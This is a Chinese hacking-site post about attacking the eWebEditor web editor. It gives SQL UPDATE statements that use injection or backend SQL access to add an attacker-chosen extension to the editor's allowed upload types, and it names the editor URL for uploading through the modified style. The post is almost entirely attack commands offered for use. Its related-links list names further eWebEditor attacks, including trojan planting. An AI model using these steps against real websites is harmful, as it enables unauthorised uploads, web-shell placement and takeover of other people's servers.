SQL注入eWebEditor数据库

2010, November 22, 11:27 PM. 黑友网文
Submitted by admin

条件:1、知道ewebeditor数据库的绝对地址

2、存在注入,或者后台可执行sql语句。

跨库注入:

update eWebEditor_Style in ‘E:\webhost\xxxxxxxx\www\admin\Editor\db\ewebeditor.mdb’ set s_imageext=’gif|jpg|jpeg|bmp|aasasa’ where s_id=40

或者

update eWebEditor_Style in ‘E:\webhost\xxxxxxxx\www\admin\Editor\db\ewebeditor.mdb’ set s_imageext=’gif|jpg|jpeg|bmp|aasasa’

利用:
/ewebeditor.asp?id=content1&style=standard

 
Tags: ewebeditor

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ewebeditor无后台另类拿站 (浏览: 39739, 评论: 1)
eWebEditor 2.8 商业版插一句话木马 (浏览: 9611, 评论: 0)
ewebeditor for php任意文件上传漏洞 (浏览: 12181, 评论: 0)
eWebEditor suffers from a directory traversal vulnerability (浏览: 7932, 评论: 0)
ewebeditor 5.2 列目录漏洞 (浏览: 9916, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):